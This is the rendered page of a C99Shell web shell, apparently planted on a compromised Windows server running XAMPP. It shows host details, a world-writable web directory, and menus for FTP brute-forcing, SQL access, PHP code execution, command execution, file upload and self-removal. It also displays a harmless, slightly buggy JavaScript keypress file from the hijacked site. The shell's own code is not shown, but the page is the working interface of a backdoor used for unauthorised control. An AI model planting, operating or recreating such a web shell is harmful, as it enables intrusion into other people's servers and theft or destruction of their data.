!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\htdocs\CatalogoIsis\pWinisis\CATALOGO WEB\Dama\CentroDoc\Js\   drwxrwxrwx
Free 8.76 GB of 239.26 GB (3.66%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Enter.js (1.18 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
	// Combinada

	function netscapeKeyPressComb(e) {
		if (e.which == 13)
			GoComb(document.forms[0], document.forms[0].elements[2], document.forms[0].elements[3], document.forms[0].elements[4], document.forms[0].elements[5], document.forms[0].elements[6], document.forms[0].elements[7], document.forms[0].elements[8], document.forms[0].elements[9]);
	}

	function microsoftKeyPressComb() {
		if (window.event.keyCode == 13){
			GoComb(document.forms[0], document.forms[0].elements[2], document.forms[0].elements[3], document.forms[0].elements[4], document.forms[0].elements[5], document.forms[0].elements[6], document.forms[0].elements[7], document.forms[0].elements[8], document.forms[0].elements[9]);
		}
	}

	// Diccionario

	function netscapeKeyPressDic(e) {
		if (e.which == 13)
			GoCDic(document.forms[0], document.forms[0].elements[0], document.forms[0].elements[1]);
	}

	function microsoftKeyPressDic() {
		if (window.event.keyCode == 13){
			GoDic(document.forms[0], document.forms[0].elements[0], document.forms[0].elements[1]);
		}
	}


	if (navigator.appName == 'Netscape') {
		window.captureEvents(Event.KEYPRESS);
		window.onKeyPress = netscapeKeyPress;
	}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--